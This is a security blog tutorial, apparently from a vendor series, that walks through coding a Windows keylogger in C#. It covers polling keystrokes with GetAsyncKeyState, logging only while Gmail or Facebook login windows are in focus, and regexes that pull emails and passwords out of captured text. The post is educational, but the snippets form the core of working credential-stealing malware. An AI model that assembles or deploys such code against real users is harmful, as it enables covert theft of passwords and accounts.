This article is part of the series “Malware Coding Lessons for IT People”.
The world of hacking is roughly divided into three different categories of attackers:
- The “Skids” (script kiddies) – beginning hackers who gather existing code samples and tools for their own use and create some basic malware.
- The “Buyers” – hackpreneurs, teenagers, and other thrill seekers who purchase malware coding services in the cloud, collect PII, and then perhaps resell the stolen personal data on the black market.
- The “Blackhat coders” – malware wizards who code new malware and work out exploits from scratch.
Can anyone with good software skills get to the level of “Blackhat coder”? No, you’re not going to be creating something like Regin after attending a few DEFCON sessions.
On the other hand, I really believe that an IT security person should master some of the programming concepts that go into malware.
Why Should an IT Person Learn These Dark Skills?
File that under “know your enemy”. As the Inside Out blog has been pointing out, you have to think like a hacker to stop one. I’m an infosec specialist at Varonis, and in my experience, you’ll be better at data security once you understand how the offense plays its game.
And that’s the reason I decided to start this series of posts on the details underlying malware and different hacking tool families. Once you understand how relatively simple it is to create undetectable malware, you’ll want to take a different approach to data security at your organization. More on that later.
I won’t be getting too technical, so don’t get scared off.
For these informal “hacking 101 classes”, you’ll need some coding knowledge (C# and Java) and some understanding of Windows. Keep in mind that most real-world malware tools are written in C, C++, or Delphi, which avoids the dependency on the .NET Framework that C# programs carry.
I also like using C# in my coding examples because it reads almost like a story, even if you aren’t familiar with the syntax.
Keyloggers for IT People
A keylogger is a piece of software or hardware that can intercept and record the keystrokes of a compromised machine. Think of it as a digital tap that captures every keystroke from the keyboard.
Often the keylogger function is embedded in another piece of malware. Andy has already written about how keyloggers are typically part of Remote Access Trojans, or RATs, which also provide stealthy ways to get the logged keystrokes back to the attacker.
There are hardware/firmware keyloggers, but they’re less common since they require physical access to the machine or direct tampering with the hardware.
However, the keylogger function is fairly easy to code in software. So let’s break it down now. But first, a few warnings to make our lawyers happy.
If you’re going to try any of this on your own in a business environment, make sure to get permission, and consider running your tests in a separate VM.
Next, the examples below will not compile on their own. I’m just showing you the bits of code that perform the desired action; it’s not the most elegant or best way to do it.
Finally, I will not be showing you how to make the keylogger persistent so that it survives a reboot, nor will I show how to make it avoid detection using special coding techniques. I don’t want to go too far into the dark side. Let’s just say malware in the wild is good at resisting removal even if you manage to detect it.
Let’s dive into the code.
To read the keyboard state, all you have to do is use these two C# lines:
[DllImport("user32.dll")]
public static extern int GetAsyncKeyState(Int32 i);
You can read more about the GetAsyncKeyState API on MSDN:
https://msdn.microsoft.com/en-us/library/windows/desktop/ms646293(v=vs.85).aspx
Summing up these two lines of code in one sentence: they declare GetAsyncKeyState, which determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.
Now you continually call this function to get the keyboard data you need:
while (true)
{
    Thread.Sleep(100);
    for (Int32 i = 0; i < 255; i++)
    {
        int state = GetAsyncKeyState(i);
        if (state == 1 || state == -32767)
        {
            Console.WriteLine((Keys)i);
        }
    }
}
What’s going on here?
The loop will poll the keyboard every 100 milliseconds to detect the state of each key.
If one of them is pressed (or has been pressed), it will print it out to the console. In a real keylogger, the keystrokes would be buffered and then stealthily transmitted back to the hacker.
Smarter Keylogging
But wait, wouldn’t it make sense to zero in on a key stream going to a single app?
The above code pulls in the raw keyboard input from whichever window and input box currently has the focus. If the goal of your hacking is to get passwords or credit card numbers, this approach is not very efficient.
It would get even harder if the keylogger were running on thousands of computers (this isn’t unheard of in the real world) and sending the results back to the hacker’s command center. A hacker would have a very difficult time parsing the stream to find the valuable information.
For the sake of argument, let’s assume what I really want to do is steal Facebook or Gmail credentials and use them to sell “Likes”.
Here’s the new idea: activate the keylogging method only when a browser is active, and the title of the web page contains the word “Facebook” or “Gmail”.
By using this method of limiting the input to browsers, I increase my chances of spotting user names and passwords.
Here’s my second version of the code:
while (true)
{
    IntPtr handle = GetForegroundWindow();
    if (GetWindowText(handle, buff, chars) > 0)
    {
        string line = buff.ToString();
        if (line.Contains("Gmail") || line.Contains("Facebook - Log In or Sign Up "))
        {
            //Check keyboard
        }
    }
    Thread.Sleep(100);
}
This code snippet probes the active window every 100 ms. GetForegroundWindow and GetWindowText do the real heavy lifting: the first returns a handle to the window the user is currently working in, and the second copies that window’s title into the “buff” variable. The keyboard-scanning code is called only if the title contains “Gmail” or “Facebook - Log In or Sign Up”.
You can learn more about these APIs at MSDN.
I’ve just ensured that I get keystrokes only when the user is browsing the Facebook login page or Gmail.
Even Smarter Keylogging
Let’s assume the hacker has been pulling the output from keyloggers using something like the code above. Suppose this is an ambitious hacker who has managed to infect tens or hundreds of thousands of laptops. Result: a huge file with megabytes of text in which the good stuff (email addresses and passwords) is hidden.
Now is a good time to get acquainted with regular expressions, or regex. Regex is a mini language for describing text patterns and finding the text that matches them.
You can read more about regexes here.
Here are two example regexes, one for email addresses and one for password-like strings, that could be used to pick credentials out of a wall of text:
//Identify Email
^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$
//Identify Password
(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])
The above regexes are meant to hint at what can be done with smart regex scanning.
With regex, I can search for social security numbers, credit card numbers, bank accounts, phone numbers, names, passwords: really, anything that has a recognizable pattern can be expressed as a regex.
Admittedly it’s not the easiest thing to read. But regex is a programmer’s best friend — better than Red Bull!
Languages such as Java, C#, JavaScript, and others have built-in regex support: you supply the expression describing what you want to match (the cryptic code above) and run it against the text that may contain the pattern.
In C#, using these regexes looks like this:
Regex re = new Regex(@"^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$");
Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])");
string email = "Oded.awask@gmail.com";
string pass = "abcde3FG";
Match result = re.Match(email);
Match result2 = re2.Match(pass);
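The first regex (re) matches email addresses. Because it is anchored with ^ and $, it matches only when the entire input string is an address.
The second regex (re2) matches password-like strings: at least six characters long, containing at least one letter and at least one digit.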
Free FUD
Back in my own lab, I used Visual Studio (you can use your favorite IDE) to code a malicious keylogger tool in under 30 minutes.
If I were a real hacker, I would define targets (e.g., banking sites, social sites) and then adapt the code to fit my needs. Of course, I’d also have to launch a phishing campaign that delivers the exe embedded in a harmless-looking invoice or other document.
The only question left to answer: is it FUD (fully undetectable)?
I compiled my code and then checked the exe against VirusTotal. That’s a web service that runs a submitted file through dozens of antivirus engines and checks its hash against known malware samples. Not surprisingly, VirusTotal couldn’t find a match.
That’s the point! It’s easy for hackers to continually evolve and change their code so it’s always a few steps ahead of the scanners. If you can do your own coding, you’re almost guaranteed FUD.
The lesson for IT security is that virus scanners alone will not protect your organization.
Click here to see the complete analysis page at VirusTotal.
In my next post, I’ll take on ransomware and show you how easy it is to code a FUD version.